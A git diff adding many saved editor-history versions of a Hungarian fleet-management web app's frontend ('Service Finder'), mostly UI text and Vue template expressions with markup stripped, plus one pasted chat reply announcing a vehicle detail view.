attributes like + 'class' into lists. Setting this to a dictionary will + customize this behavior; look at :py:attr:`bs4.builder.HTMLTreeBuilder.DEFAULT_CDATA_LIST_ATTRIBUTES` + for an example. + + Internally, these are called "CDATA list attributes", but that + probably doesn't make sense to an end-user, so the argument name + is ``multi_valued_attributes``. + + :param preserve_whitespace_tags: A set of tags to treat + the way
 tags are treated in HTML. Tags in this set
+     are immune from pretty-printing; their contents will always be
+     output as-is.
+
+    :param string_containers: A dictionary mapping tag names to
+     the classes that should be instantiated to contain the textual
+     contents of those tags. The default is to use NavigableString
+     for every tag, no matter what the name. You can override the
+     default by changing :py:attr:`DEFAULT_STRING_CONTAINERS`.
+
+    :param store_line_numbers: If the parser keeps track of the line
+     numbers and positions of the original markup, that information
+     will, by default, be stored in each corresponding
+     :py:class:`bs4.element.Tag` object. You can turn this off by
+     passing store_line_numbers=False; then Tag.sourcepos and
+     Tag.sourceline will always be None. If the parser you're using
+     doesn't keep track of this information, then store_line_numbers
+     is irrelevant.
+
+    :param attribute_dict_class: The value of a multi-valued attribute
+      (such as HTML's 'class') willl be stored in an instance of this
+      class.  The default is Beautiful Soup's built-in
+      `AttributeValueList`, which is a normal Python list, and you
+      will probably never need to change it.
+    """
+
+    USE_DEFAULT: Any = object()  #: :meta private:
+
+    def __init__(
+        self,
+        multi_valued_attributes: Dict[str, Set[str]] = USE_DEFAULT,
+        preserve_whitespace_tags: Set[str] = USE_DEFAULT,
+        store_line_numbers: bool = USE_DEFAULT,
+        string_containers: Dict[str, Type[NavigableString]] = USE_DEFAULT,
+        empty_element_tags: Set[str] = USE_DEFAULT,
+        attribute_dict_class: Type[AttributeDict] = AttributeDict,
+        attribute_value_list_class: Type[AttributeValueList] = AttributeValueList,
+    ):
+        self.soup = None
+        if multi_valued_attributes is self.USE_DEFAULT:
+            multi_valued_attributes = self.DEFAULT_CDATA_LIST_ATTRIBUTES
+        self.cdata_list_attributes = multi_valued_attributes
+        if preserve_whitespace_tags is self.USE_DEFAULT:
+            preserve_whitespace_tags = self.DEFAULT_PRESERVE_WHITESPACE_TAGS
+        self.preserve_whitespace_tags = preserve_whitespace_tags
+        if empty_element_tags is self.USE_DEFAULT:
+            self.empty_element_tags = self.DEFAULT_EMPTY_ELEMENT_TAGS
+        else:
+            self.empty_element_tags = empty_element_tags
+        # TODO: store_line_numbers is probably irrelevant now that
+        # the behavior of sourceline and sourcepos has been made consistent
+        # everywhere.
+        if store_line_numbers == self.USE_DEFAULT:
+            store_line_numbers = self.TRACKS_LINE_NUMBERS
+        self.store_line_numbers = store_line_numbers
+        if string_containers == self.USE_DEFAULT:
+            string_containers = self.DEFAULT_STRING_CONTAINERS
+        self.string_containers = string_containers
+        self.attribute_dict_class = attribute_dict_class
+        self.attribute_value_list_class = attribute_value_list_class
+
+    NAME: str = "[Unknown tree builder]"
+    ALTERNATE_NAMES: Iterable[str] = []
+    features: Iterable[str] = []
+
+    is_xml: bool = False
+    picklable: bool = False
+
+    soup: Optional[BeautifulSoup]  #: :meta private:
+
+    #: A tag will be considered an empty-element
+    #: tag when and only when it has no contents.
+    empty_element_tags: Optional[Set[str]] = None  #: :meta private:
+    cdata_list_attributes: Dict[str, Set[str]]  #: :meta private:
+    preserve_whitespace_tags: Set[str]  #: :meta private:
+    string_containers: Dict[str, Type[NavigableString]]  #: :meta private:
+    tracks_line_numbers: bool  #: :meta private:
+
+    #: A value for these tag/attribute combinations is a space- or
+    #: comma-separated list of CDATA, rather than a single CDATA.
+    DEFAULT_CDATA_LIST_ATTRIBUTES: Dict[str, Set[str]] = defaultdict(set)
+
+    #: Whitespace should be preserved inside these tags.
+    DEFAULT_PRESERVE_WHITESPACE_TAGS: Set[str] = set()
+
+    #: The textual contents of tags with these names should be
+    #: instantiated with some class other than `bs4.element.NavigableString`.
+    DEFAULT_STRING_CONTAINERS: Dict[str, Type[bs4.element.NavigableString]] = {} # type:ignore
+
+    #: By default, tags are treated as empty-element tags if they have
+    #: no contents--that is, using XML rules. HTMLTreeBuilder
+    #: defines a different set of DEFAULT_EMPTY_ELEMENT_TAGS based on the
+    #: HTML 4 and HTML5 standards.
+    DEFAULT_EMPTY_ELEMENT_TAGS: Optional[Set[str]] = None
+
+    #: Most parsers don't keep track of line numbers.
+    TRACKS_LINE_NUMBERS: bool = False
+
+    def initialize_soup(self, soup: BeautifulSoup) -> None:
+        """The BeautifulSoup object has been initialized and is now
+        being associated with the TreeBuilder.
+
+        :param soup: A BeautifulSoup object.
+        """
+        self.soup = soup
+
+    def reset(self) -> None:
+        """Do any work necessary to reset the underlying parser
+        for a new document.
+
+        By default, this does nothing.
+        """
+        pass
+
+    def can_be_empty_element(self, tag_name: str) -> bool:
+        """Might a tag with this name be an empty-element tag?
+
+        The final markup may or may not actually present this tag as
+        self-closing.
+
+        For instance: an HTMLBuilder does not consider a 

tag to be + an empty-element tag (it's not in + HTMLBuilder.empty_element_tags). This means an empty

tag + will be presented as "

", not "

" or "

". + + The default implementation has no opinion about which tags are + empty-element tags, so a tag will be presented as an + empty-element tag if and only if it has no children. + "" will become "", and "bar" will + be left alone. + + :param tag_name: The name of a markup tag. + """ + if self.empty_element_tags is None: + return True + return tag_name in self.empty_element_tags + + def feed(self, markup: _RawMarkup) -> None: + """Run incoming markup through some parsing process.""" + raise NotImplementedError() + + def prepare_markup( + self, + markup: _RawMarkup, + user_specified_encoding: Optional[_Encoding] = None, + document_declared_encoding: Optional[_Encoding] = None, + exclude_encodings: Optional[_Encodings] = None, + ) -> Iterable[Tuple[_RawMarkup, Optional[_Encoding], Optional[_Encoding], bool]]: + """Run any preliminary steps necessary to make incoming markup + acceptable to the parser. + + :param markup: The markup that's about to be parsed. + :param user_specified_encoding: The user asked to try this encoding + to convert the markup into a Unicode string. + :param document_declared_encoding: The markup itself claims to be + in this encoding. NOTE: This argument is not used by the + calling code and can probably be removed. + :param exclude_encodings: The user asked *not* to try any of + these encodings. + + :yield: A series of 4-tuples: (markup, encoding, declared encoding, + has undergone character replacement) + + Each 4-tuple represents a strategy that the parser can try + to convert the document to Unicode and parse it. Each + strategy will be tried in turn. + + By default, the only strategy is to parse the markup + as-is. See `LXMLTreeBuilderForXML` and + `HTMLParserTreeBuilder` for implementations that take into + account the quirks of particular parsers. + + :meta private: + + """ + yield markup, None, None, False + + def test_fragment_to_document(self, fragment: str) -> str: + """Wrap an HTML fragment to make it look like a document. + + Different parsers do this differently. For instance, lxml + introduces an empty tag, and html5lib + doesn't. Abstracting this away lets us write simple tests + which run HTML fragments through the parser and compare the + results against other HTML fragments. + + This method should not be used outside of unit tests. + + :param fragment: A fragment of HTML. + :return: A full HTML document. + :meta private: + """ + return fragment + + def set_up_substitutions(self, tag: Tag) -> bool: + """Set up any substitutions that will need to be performed on + a `Tag` when it's output as a string. + + By default, this does nothing. See `HTMLTreeBuilder` for a + case where this is used. + + :return: Whether or not a substitution was performed. + :meta private: + """ + return False + + def _replace_cdata_list_attribute_values( + self, tag_name: str, attrs: _RawOrProcessedAttributeValues + ) -> _AttributeValues: + """When an attribute value is associated with a tag that can + have multiple values for that attribute, convert the string + value to a list of strings. + + Basically, replaces class="foo bar" with class=["foo", "bar"] + + NOTE: This method modifies its input in place. + + :param tag_name: The name of a tag. + :param attrs: A dictionary containing the tag's attributes. + Any appropriate attribute values will be modified in place. + :return: The modified dictionary that was originally passed in. + """ + + # First, cast the attrs dict to _AttributeValues. This might + # not be accurate yet, but it will be by the time this method + # returns. + modified_attrs = cast(_AttributeValues, attrs) + if not modified_attrs or not self.cdata_list_attributes: + # Nothing to do. + return modified_attrs + + # There is at least a possibility that we need to modify one of + # the attribute values. + universal: Set[str] = self.cdata_list_attributes.get("*", set()) + tag_specific = self.cdata_list_attributes.get(tag_name.lower(), None) + for attr in list(modified_attrs.keys()): + modified_value: _AttributeValue + if attr in universal or (tag_specific and attr in tag_specific): + # We have a "class"-type attribute whose string + # value is a whitespace-separated list of + # values. Split it into a list. + original_value: _AttributeValue = modified_attrs[attr] + if isinstance(original_value, _RawAttributeValue): + # This is a _RawAttributeValue (a string) that + # needs to be split and converted to a + # AttributeValueList so it can be an + # _AttributeValue. + modified_value = self.attribute_value_list_class( + nonwhitespace_re.findall(original_value) + ) + else: + # html5lib calls setAttributes twice for the + # same tag when rearranging the parse tree. On + # the second call the attribute value here is + # already a list. This can also happen when a + # Tag object is cloned. If this happens, leave + # the value alone rather than trying to split + # it again. + modified_value = original_value + modified_attrs[attr] = modified_value + return modified_attrs + + +class SAXTreeBuilder(TreeBuilder): + """A Beautiful Soup treebuilder that listens for SAX events. + + This is not currently used for anything, and it will be removed + soon. It was a good idea, but it wasn't properly integrated into the + rest of Beautiful Soup, so there have been long stretches where it + hasn't worked properly. + """ + + def __init__(self, *args: Any, **kwargs: Any) -> None: + warnings.warn( + "The SAXTreeBuilder class was deprecated in 4.13.0 and will be removed soon thereafter. It is completely untested and probably doesn't work; do not use it.", + DeprecationWarning, + stacklevel=2, + ) + super(SAXTreeBuilder, self).__init__(*args, **kwargs) + + def feed(self, markup: _RawMarkup) -> None: + raise NotImplementedError() + + def close(self) -> None: + pass + + def startElement(self, name: str, attrs: Dict[str, str]) -> None: + attrs = AttributeDict((key[1], value) for key, value in list(attrs.items())) + # print("Start %s, %r" % (name, attrs)) + assert self.soup is not None + self.soup.handle_starttag(name, None, None, attrs) + + def endElement(self, name: str) -> None: + # print("End %s" % name) + assert self.soup is not None + self.soup.handle_endtag(name) + + def startElementNS( + self, nsTuple: Tuple[str, str], nodeName: str, attrs: Dict[str, str] + ) -> None: + # Throw away (ns, nodeName) for now. + self.startElement(nodeName, attrs) + + def endElementNS(self, nsTuple: Tuple[str, str], nodeName: str) -> None: + # Throw away (ns, nodeName) for now. + self.endElement(nodeName) + # handler.endElementNS((ns, node.nodeName), node.nodeName) + + def startPrefixMapping(self, prefix: str, nodeValue: str) -> None: + # Ignore the prefix for now. + pass + + def endPrefixMapping(self, prefix: str) -> None: + # Ignore the prefix for now. + # handler.endPrefixMapping(prefix) + pass + + def characters(self, content: str) -> None: + assert self.soup is not None + self.soup.handle_data(content) + + def startDocument(self) -> None: + pass + + def endDocument(self) -> None: + pass + + +class HTMLTreeBuilder(TreeBuilder): + """This TreeBuilder knows facts about HTML, such as which tags are treated + specially by the HTML standard. + """ + + #: Some HTML tags are defined as having no contents. Beautiful Soup + #: treats these specially. + DEFAULT_EMPTY_ELEMENT_TAGS: Optional[Set[str]] = set( + [ + # These are from HTML5. + "area", + "base", + "br", + "col", + "embed", + "hr", + "img", + "input", + "keygen", + "link", + "menuitem", + "meta", + "param", + "source", + "track", + "wbr", + # These are from earlier versions of HTML and are removed in HTML5. + "basefont", + "bgsound", + "command", + "frame", + "image", + "isindex", + "nextid", + "spacer", + ] + ) + + #: The HTML standard defines these tags as block-level elements. Beautiful + #: Soup does not treat these elements differently from other elements, + #: but it may do so eventually, and this information is available if + #: you need to use it. + DEFAULT_BLOCK_ELEMENTS: Set[str] = set( + [ + "address", + "article", + "aside", + "blockquote", + "canvas", + "dd", + "div", + "dl", + "dt", + "fieldset", + "figcaption", + "figure", + "footer", + "form", + "h1", + "h2", + "h3", + "h4", + "h5", + "h6", + "header", + "hr", + "li", + "main", + "nav", + "noscript", + "ol", + "output", + "p", + "pre", + "section", + "table", + "tfoot", + "ul", + "video", + ] + ) + + #: These HTML tags need special treatment so they can be + #: represented by a string class other than `bs4.element.NavigableString`. + #: + #: For some of these tags, it's because the HTML standard defines + #: an unusual content model for them. I made this list by going + #: through the HTML spec + #: (https://html.spec.whatwg.org/#metadata-content) and looking for + #: "metadata content" elements that can contain strings. + #: + #: The Ruby tags ( and ) are here despite being normal + #: "phrasing content" tags, because the content they contain is + #: qualitatively different from other text in the document, and it + #: can be useful to be able to distinguish it. + #: + #: TODO: Arguably

+ + +
+
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
{{ car.plate }}
{{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }}
+
+
+
+
+ +
+ +
+
+
+ +
+

{{ selectedCar.brand }} {{ selectedCar.model }}

{{ selectedCar.plate }}ÁLLAPOT: {{ selectedCar.status }}
+
+
+
+ + +
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
Állapot
+
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
Idei költés
+
Hiba:

{{ selectedCar.current_issue }}

Nincs hiba
+
+
+
+
Még üres a szervizkönyv.
+
+
+
+
+
+
{{ translateType(item.type) }}+{{ formatMoney(item.amount, item.currency) }}
+

{{ item.description }}

+
{{ item.mileage.toLocaleString() }} kmCsatolmány
+
+
{{ item.date }}
+
+
+
+
+
+
+ + + + +
+
+ + + + + diff --git a/code-server-config/data/User/History/-52e5c41d/83UF.html b/code-server-config/data/User/History/-52e5c41d/83UF.html new file mode 100755 index 0000000..61441b0 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/83UF.html @@ -0,0 +1,242 @@ + + + + + + Service Finder - Flotta Kezelő + + + + + + +
+
+
+

Service Finder

+
+ + + +

Nincs fiókod? Regisztrálj!

+
+
+ + + +

Vissza a belépéshez

+
+
+
+ +
+ + +
+
+
+

Saját Járművek

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ {{ car.plate }} + +
+
+
+
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ +
+
+
+ +
+
+
Km állás
{{ selectedCar.mileage }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Állapot
{{ selectedCar.status }}
+
+
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/9eYi.html b/code-server-config/data/User/History/-52e5c41d/9eYi.html new file mode 100755 index 0000000..f2b47ef --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/9eYi.html @@ -0,0 +1,216 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} +
+
+
+
+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+
+ + +
+
+ + + +
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
Állapot
+
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
Idei költés
+
+
+
Hiba:

{{ selectedCar.current_issue }}

+
+
Nincs hiba
+
+
+
+ +
+
Még üres a szervizkönyv.
+
+
+
+
+
+
+ {{ translateType(item.type) }} + +{{ formatMoney(item.amount, item.currency) }} +
+

{{ item.description }}

+
+ {{ item.mileage.toLocaleString() }} km + + Csatolmány + +
+
+
{{ item.date }}
+
+
+
+
+
+
+ + + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/E3XE.html b/code-server-config/data/User/History/-52e5c41d/E3XE.html new file mode 100755 index 0000000..08185a3 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/E3XE.html @@ -0,0 +1,179 @@ + + + + + Szerviz Kereső - Flotta Menedzser + + + + + +
+ + +
+
+

Service Finder

+ +
+ + + +

Nincs még fiókod? Regisztráció

+
+ +
+ + + +

Vissza a belépéshez

+
+
+
+ +
+
+
+

Garázsom

+ +
+ +
+
+
+
+
{{car.brand}}
+ {{car.plate}} +
+
{{car.model}}
+
+ + +
+
+
+
+
+ +
+ +
+

{{selectedCar.brand}} {{selectedCar.model}}

+

Rendszám: {{selectedCar.plate}}

+
+
+
Állapot
Kiváló
+
Szerviz
Aktuális
+
Csapat
1 Sofőr
+
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/J4V4.html b/code-server-config/data/User/History/-52e5c41d/J4V4.html new file mode 100755 index 0000000..0af5ede --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/J4V4.html @@ -0,0 +1,200 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ + +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ + {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} + +
+
+
+
+

Csapat...

+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+ +
+ +
+
+
+
{{ selectedCar.mileage }}
Km
+
+
+
+
+ + {{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }} +
+
Műszaki állapot
+
+
+ +
+
+
+
+
Nyitott probléma:
+

{{ selectedCar.current_issue }}

+
+ +
+ A javítás rögzítése naplózásra kerül. +
+ +
+ Nincs nyitott hiba. Az autó útra kész. +
+
+
+
+
+ + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/JA3R.html b/code-server-config/data/User/History/-52e5c41d/JA3R.html new file mode 100755 index 0000000..3bfffb8 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/JA3R.html @@ -0,0 +1,247 @@ + + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ + +
+
+

Járművek

+ +
+
+
+
+
+ +
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ + {{ car.has_issues ? 'HIBA' : translateRole(car.role) }} + +
+
+
+
+
+ +
+

Csapat nézet (változatlan)

+ +
+
+ +
+ + + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + HIBA JELENTVE + ÁLLAPOT: OK +
+
+
+
+ + +
+
+ + + +
+
+
+
+
{{ selectedCar.mileage ? selectedCar.mileage.toLocaleString() : 0 }} km
+
Aktuális óraállás
+
+
+
+
+
+ + {{ selectedCar.has_issues ? 'HIBA' : 'OK' }} +
+
Műszaki állapot
+
+
+
+
+
Nyitott probléma:
+

{{ selectedCar.last_issue_text }}

+
+ +
+
+
+ Nincs nyitott hiba. Az autó útra kész. +
+
+
+
+
+ + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/Rpxl.html b/code-server-config/data/User/History/-52e5c41d/Rpxl.html new file mode 100755 index 0000000..edd7e7d --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/Rpxl.html @@ -0,0 +1,208 @@ + + + + + + Service Finder - Garázs + + + + + + +
+ + +
+ +
+
+

Saját Járművek

+ {{ myCars.length }} db +
+ +
+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ + +
+ +
+
{{ car.plate }}
+ + {{ translateRole(car.role) }} + +
+ +
+ Adatlap megnyitása +
+
+
+ +
+
+
+ +
Új jármű
+
+
+
+
+
+ +
+
+

{{ step }} Új rögzítése

+ +
+ +
+
+
+
+
+
+
+
+ +
+
Jármű: {{ form.brand }} {{ form.model.model }}
+
+
+
+
+
+
+
+
+ +
+ +

Sikeres rögzítés!

+ +
+
+ +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/SVyy.html b/code-server-config/data/User/History/-52e5c41d/SVyy.html new file mode 100755 index 0000000..f55b0a0 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/SVyy.html @@ -0,0 +1,241 @@ + + + + + + Service Finder - Flotta Kezelő + + + + + + +
+
+
+

Service Finder

+
+ + + +

Nincs fiókod? Regisztrálj!

+
+
+ + + +

Vissza a belépéshez

+
+
+
+ +
+ + +
+
+
+

Saját Járművek

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ {{ car.plate }} + +
+
+
+
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ +
+
+
+ +
+
+
Km állás
{{ selectedCar.mileage }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Állapot
{{ selectedCar.status }}
+
+
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/Smd7.html b/code-server-config/data/User/History/-52e5c41d/Smd7.html new file mode 100755 index 0000000..54223ec --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/Smd7.html @@ -0,0 +1,263 @@ + + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ + +
+
+

Járművek

+ +
+
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ +
+
+
{{ car.plate }}
+ {{ translateRole(car.role) }} +
+
+
+
+
+ +
+
+

Munkatársak

+ +
+
Nincs adat
+
+ + + + + + + + + + +
NévSzerepkörOrszágCsatlakozott
Munkatárs
{{member.email}}
{{translateRole(member.role)}}{{member.country}}{{member.joined_at ? member.joined_at.split('T')[0] : ''}}
+
+
+
+ +
+ + + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + {{ translateRole(selectedCar.role) }} + {{ selectedCar.vin }} +
+
+
+
+ + +
+
+ + + +
+ +
+
+
+
+
{{ selectedCar.mileage.toLocaleString() }} km
+
Aktuális óraállás
+
+
+
+
+
OK
+
Műszaki állapot
+
+
+
+
+
{{ formatCurrency(0, selectedCar.currency) }}
+
Idei költés
+
+
+
+
+
{{ selectedCar.start_date }}
+
Flottába került
+
+
+
+ +
Legutóbbi aktivitás
+
+ + Még nincs rögzített esemény. +
+
+ +
+
+ +
A szerviztörténet üres
+

Rögzíts tankolást vagy szervizt a jobb felső gombbal!

+
+
+ +
+
Veszélyzóna
+
+

Jármű eltávolítása a flottából vagy eladás.

+ +
+ +
+
+ + + +

Varázsló...

+ +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/SxEq.html b/code-server-config/data/User/History/-52e5c41d/SxEq.html new file mode 100755 index 0000000..428427e --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/SxEq.html @@ -0,0 +1,228 @@ + + + + + + Service Finder - Flotta Kezelő + + + + + + +
+
+
+

Service Finder

+
+ + + +

Nincs fiókod? Regisztrálj!

+
+
+ + + +

Vissza a belépéshez

+
+
+
+ +
+ + +
+
+
+

Saját Járművek

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ {{ car.plate }} + +
+
+
+
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ +
+
+
+ +
+
+
Km állás
{{ selectedCar.mileage }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Állapot
{{ selectedCar.status }}
+
+
+
+
+
+ + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/UAc0.html b/code-server-config/data/User/History/-52e5c41d/UAc0.html new file mode 100755 index 0000000..f5ed49c --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/UAc0.html @@ -0,0 +1,142 @@ + + + + + + Service Finder + + + + + + +
+
+
+

Service Finder

+
+ +
+
+ +
+ +

Nincs fiókod? Regisztráció

+
+
+ +
+ + +
+
+

Garázs

+
Üdv: {{ userEmail }}
+
+ +
+ + Még nincsenek járművek a profilodhoz rendelve. +
Használd a pgAdmint vagy az API-t a járművek hozzárendeléséhez az ID: {{ userId }} felhasználóhoz. +
+ +
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+ {{ car.plate }} +
+
+
+
+
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/UE2n.html b/code-server-config/data/User/History/-52e5c41d/UE2n.html new file mode 100755 index 0000000..61fe69e --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/UE2n.html @@ -0,0 +1,203 @@ + + + + + + Service Finder - Profi Flotta + + + + + + +
+
+
+

Service Finder

+ + + +

Regisztráció

+
+
+ +
+ + +
+
+
+

Garázsom

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+ {{ car.plate }} +
+
+
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ + +
+
+
+
Km állás
{{ selectedCar.mileage }}
+
Státusz
{{ selectedCar.status }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
+
+
+
+
+ + + + +
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/W3D5.html b/code-server-config/data/User/History/-52e5c41d/W3D5.html new file mode 100755 index 0000000..9e079e0 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/W3D5.html @@ -0,0 +1,280 @@ +Senior PM-ként mondom: Vettem az adást! 📡 A motor (Backend) már duruzsol, most építsük rá a műszerfalat (Frontend). + +Ez a frissítés a rendszer leglátványosabb része lesz. Amikor rákattintasz egy autóra a Garázsban, az nem csak egy sima ablakot nyit meg, hanem egy teljes Jármű Irányítópultot, három fő füllel: + + Áttekintés (Overview): A legfontosabb adatok (Rendszám, Alvázszám, Aktuális km). + + Szervizkönyv (History): (Egyelőre üres, de ide jönnek majd a bejegyzések). + + Beállítások: Itt lehet majd sofőrt cserélni vagy eladni az autót. + +🎨 Frontend 7.0 – A Részletes Adatlap + +Másold be ezt a kódot. Figyeld meg a formatCurrency függvényt a script alján! Ez már felkészült arra, hogy ha a felhasználó német (EUR), akkor úgy írja ki az összegeket, ha magyar (HUF), akkor meg úgy. +Bash + +echo "--- 🖥️ Frontend 7.0: Jármű Részletes Adatlap (Detail View) ---" + +cat < frontend/index.html + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ + +
+
+

Járművek

+ +
+
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ +
+
+
{{ car.plate }}
+ {{ translateRole(car.role) }} +
+
+
+
+
+ +
+
+

Munkatársak

+ +
+
Nincs adat
+
+ + + + + + + + + + +
NévSzerepkörOrszágCsatlakozott
Munkatárs
{{member.email}}
{{translateRole(member.role)}}{{member.country}}{{member.joined_at ? member.joined_at.split('T')[0] : ''}}
+
+
+
+ +
+ + + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + {{ translateRole(selectedCar.role) }} + {{ selectedCar.vin }} +
+
+
+
+ + +
+
+ + + +
+ +
+
+
+
+
{{ selectedCar.mileage.toLocaleString() }} km
+
Aktuális óraállás
+
+
+
+
+
OK
+
Műszaki állapot
+
+
+
+
+
{{ formatCurrency(0, selectedCar.currency) }}
+
Idei költés
+
+
+
+
+
{{ selectedCar.start_date }}
+
Flottába került
+
+
+
+ +
Legutóbbi aktivitás
+
+ + Még nincs rögzített esemény. +
+
+ +
+
+ +
A szerviztörténet üres
+

Rögzíts tankolást vagy szervizt a jobb felső gombbal!

+
+
+ +
+
Veszélyzóna
+
+

Jármű eltávolítása a flottából vagy eladás.

+ +
+ +
+
+ + + +

Varázsló...

+ +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/Ycqg.html b/code-server-config/data/User/History/-52e5c41d/Ycqg.html new file mode 100755 index 0000000..d84fb57 --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/Ycqg.html @@ -0,0 +1,216 @@ + + + + + + Service Finder + + + + + + +
+ + +
+ +
+ +
+
+
+
+
+
{{ car.brand }}
{{ car.model }}
+ + +
+
+
{{ car.plate }}
+ {{ (car.status !== 'OK' && car.status !== null) ? 'HIBA' : car.role }} +
+
+
+
+
+ +
+ + +
+
+
+ +
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+
+ {{ selectedCar.plate }} + ÁLLAPOT: {{ selectedCar.status }} +
+
+
+
+ + +
+
+ + + +
+
+
+
{{ selectedCar.mileage.toLocaleString() }}
Km
+
{{ (selectedCar.status !== 'OK' && selectedCar.status !== null) ? 'HIBA' : 'OK' }}
Állapot
+
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
Idei költés
+
+
+
Hiba:

{{ selectedCar.current_issue }}

+
+
Nincs hiba
+
+
+
+ +
+
Még üres a szervizkönyv.
+
+
+
+
+
+
+ {{ translateType(item.type) }} + +{{ formatMoney(item.amount, item.currency) }} +
+

{{ item.description }}

+
+ {{ item.mileage.toLocaleString() }} km + + Csatolmány + +
+
+
{{ item.date }}
+
+
+
+
+
+
+ + + + +
+
+ + + + + \ No newline at end of file diff --git a/code-server-config/data/User/History/-52e5c41d/eRba.html b/code-server-config/data/User/History/-52e5c41d/eRba.html new file mode 100755 index 0000000..428427e --- /dev/null +++ b/code-server-config/data/User/History/-52e5c41d/eRba.html @@ -0,0 +1,228 @@ + + + + + + Service Finder - Flotta Kezelő + + + + + + +
+
+
+

Service Finder

+
+ + + +

Nincs fiókod? Regisztrálj!

+
+
+ + + +

Vissza a belépéshez

+
+
+
+ +
+ + +
+
+
+

Saját Járművek

+ +
+
+
+
+
+
{{ car.brand }}
+
{{ car.model }}
+
+ {{ car.plate }} + +
+
+
+
+
+ +
+ +
+
+
+

{{ selectedCar.brand }} {{ selectedCar.model }}

+ {{ selectedCar.plate }} +
+
+ +
+
+
+ +
+
+
Km állás
{{ selectedCar.mileage }}
+
Idei költség
{{ formatMoney(selectedCar.year_cost, selectedCar.currency) }}
+
Állapot
{{ selectedCar.status }}
+
+
+
+
+
+ + +
